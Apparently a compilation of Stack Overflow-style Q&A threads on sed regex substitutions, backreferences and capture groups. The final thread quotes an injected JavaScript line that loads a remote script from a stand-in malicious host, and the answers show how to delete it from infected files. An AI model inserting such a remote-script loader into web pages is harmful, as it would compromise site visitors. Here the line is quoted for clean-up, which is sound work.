sed replace with unknown section in css - sed

I could use an assist with a sed search and replace.
In this situation the file is css and the section I want to replace is among other values being set in the css. The following works:
sed -i 's/PlayButton-playCircle-kffp_v{border:2px solid hsla(0,0%,100%,.7);border-radius:50%;color:hsla(0,0%,100%,.7);display:inline-block/PlayButton-playCircle-kffp_v{border:2px solid hsla(0,0%,100%,.7);border-radius:50%;color:hsla(0,0%,100%,.7);display:none/g' file.css
But in another file.css where I wish to do the same thing the values surrounding the 'display:inline-block' may be in a different order. So it would make more sense to use something like a '.*' like "PlayButton-playCircle-kffp_v{.*;display:inline-block".
The css file is being generated automatically, once generated it is fixed, but I can't be sure what order the attributes are within the {}, I need to match the item with PlayButton-playCircle-...... that has the attribute display:inline-block and change to display:none.
Updating with answer formed with information from both commenters:
sed -i 's/\(PlayButton-playCircle-......{[^}]*;\)display:inline-block/\1display:none/g' $maincss
Instead of .*, [^}]* is used to match in the same way as .* but not matching '}' if found. This ensures the match is kept to one level of depth within {}.
Thank you!

You can rewrite it a bit as follows.
sed -i 's/\(PlayButton-playCircle-kffp_v{.*\)display:inline-block/\1display:none/g' file.css
The text between \( and \) will be captured and can be referenced as \1 in the replacement string.

Related

Add words at beginning and end of a FASTA header line with sed

I have the following line:
>XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGTCAAATCAATGATATGATTTTATCTCTTCTTAGTAAAGGTAGACTTATAATTAG
AGAAAACAAC
I would like to convert the first line as follows:
>INITWORD/XXX-220_5004_COVID-A6/FINALWORD
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT...
So far I have managed to add the first word as follows:
sed 's/>/>INITTWORD\//I'
That returns:
>INITWORD/XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT
How can i add the FINALWORD at the end of the first line?
Just substitute more. sed conveniently allows you to recall the text you matched with a back reference, so just embed that between the things you want to add.
sed 's%^>\(.*\)%>INITWORD/\1/FINALWORD%I' file.fasta
I also added a ^ beginning-of-line anchor, and switched to % delimiters so the slashes don't need to be escaped.
In some more detail, the s command's syntax is s/regex/replacement/flags where regex is a regular expression to match the text you want to replace, and replacement is the text to replace it with. In the regex, you can use grouping parentheses \(...\) to extract some of the matched text into the replacement; so \1 refers to whatever matched the first set of grouping parentheses, \2 to the second, etc. The /flags are optional single-character specifiers which modify the behavior of the command; so for example, a /g flag says to replace every match on a line, instead of just the first one (but we only expect one match per line so it's not necessary or useful here).
The I flag is non-standard but since you are using that, I assume it does something useful for you.

sed backreference not being found

I am trying to use 'sed' to replace a list of paths in a file with another path.
An example string to process is:
/path/to/file/block
I want to replace /path/to/file with something else.
I have Tried
sed -r '/\s(\S+)\/block/s/\1/new_path/'
I know it's finding the matching string but I'm getting an invalid back reference error.
How can I do this?
This may do:
echo "/path/to/file/block" | sed -r 's|/\S*/(block)|/newpath/\1|'
/newpath/block
Test
echo "test=/path/file test2=/path/to/file/block test3=/home/root/file" | sed -r 's|/\S*/(block)|/newpath/\1|'
test=/path/file test2=/newpath/block test3=/home/root/file
Back-references always refer to the pattern of the s command, not to any address (before the command).
However, in this case, there's no need for addressing: we can apply the substitution to all lines (and it will change only lines where it matches), so we can write:
s,\s(\S+)/block/, \1/new_path,
(I added a space to the RHS, as I'm guessing you didn't mean to overwrite that; also used a different separator to reduce the need for backslashes.)

Changing a character in between patterns in vi/sed

I am struggling to work out how to get a , out from inbetween various patterns such as:
500,000
xyz ,CA
I have tried something like:
sed -E "s/\([a-zA-Z]*\),([a-zA-Z]*\)/\([a-zA-Z]*\) ([a-zA-Z]*\)/g" $file -i
It picks up the first pattern, but then over writes it with the second pattern, I feel like I am missing something very simple and I can't work it out, any help really appreciated.
You're missing the notion of capture groups, I think. To refer to a parenthesized portion of the search within the replacement string, use \1 for the first group, \2 for the second group, etc.
The modified line would be:
sed -E "s/([a-zA-Z]),([a-zA-Z])/\1 \2/g" $file -i
Rather than replacing the part that matches the first ([a-zA-Z]) with the literal text "([a-zA-Z])", this modified line just copies the matched portion into the output (and likewise for the second group).

What does the following sed statement mean

sed 's/<img src=\"\([^"]*\).*/\1/g'
input:
<img src="geo.yahoo.com/b?s=792600534"; height="1" width="1" style="position: absolute;" />
output:
https://geo.yahoo.com/b?s=792600534
This part is the regular expression to match with a capturing group Later referred as \1 (first capturing group). It extracting the value of the src attribute.
First part if the regex -> <img src=\"
capturing group -> \([^"]*\)
rest of the regex -> .*
The expression inside the square brackets could be read as: "anything not a double quote".
sed is a scripting language. Its s command performs substitutions using regular expressions. The syntax is s/regex/replacement/flags. In your example, you have the regex
<img src=\"\([^"]*\).*
and the replacement
\1
and the flags
g
The regex is apparently attempting to parse HTML, which deserves you a place in a warm location where a friendly gentleman with a pitchfork helps you with motivational issues. Far, far away, God reluctantly ends the life of a fluffy kitten.
The regular expression contains a capturing group, which is simply the text which matched between the parentheses. The replacement \1 refers back to this captured text. So in brief, you are taking away the parts which matched around this captured string.
s/foo\(bar\)baz/\1/
replaces foobarbaz with just baz, retrieving the "baz" part from whatever matched, rather than hard-coding a replacement string.
The regular expression .* matches any character any number of times; the regular expression engine will prefer the longest, leftmost possible match.
The regular expression [^"]* matches a single character which is not (newline or) " and the * again says to match as many times as possible. So "\([^"]*\)" finds a double-quoted string, and captures its contents; the negated " prevents the regular expression from matching past the closing quote when matching as many characters as possible. (As noted in comments, the backslash before the first " is unnecessary, but basically harmless. It just tells us that whoever wrote this isn't a regex wizard.)
However, your example just implicitly includes the closing quote in the .* match which will simply match everything from the closing quote through to the end of the line.
The g flag says to repeat the substitution command as many times as possible; so if an input line contains multiple matches, all of them will be replaced. (Without the g flag, sed will just replace the first match it finds on a line.) But since you just removed the rest of the line, the flag isn't actually useful here; there can only ever be a single match.
The gentleman with the pitchfork doesn't want me to tell you this, but this code is not suitable for a general-purpose script. There is no guarantee that the src attribute of the img element will be immediately adjacent to the img opening tag with just a single space in between; HTML allows arbitrary spacing (including a line wrap) and you can have other attributes like id or alt or title which could go before or after the src attribute. The proper solution is to use a HTML parser to extract the src attributes of img tags with proper understanding of the surrounding syntax.
xmlstarlet sel -T -t -m "/img" -m "#src" -v '.' -n
... though the stray semicolon after the src attribute is a HTML syntax violation; is it really there in your input?
(xmlstarlet command line shamelessly adapted from https://stackoverflow.com/a/3174307/874188)

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js
You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashed and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline
character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be
treated literally. For example, in the context address \xabc\xdefx, the RE
delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.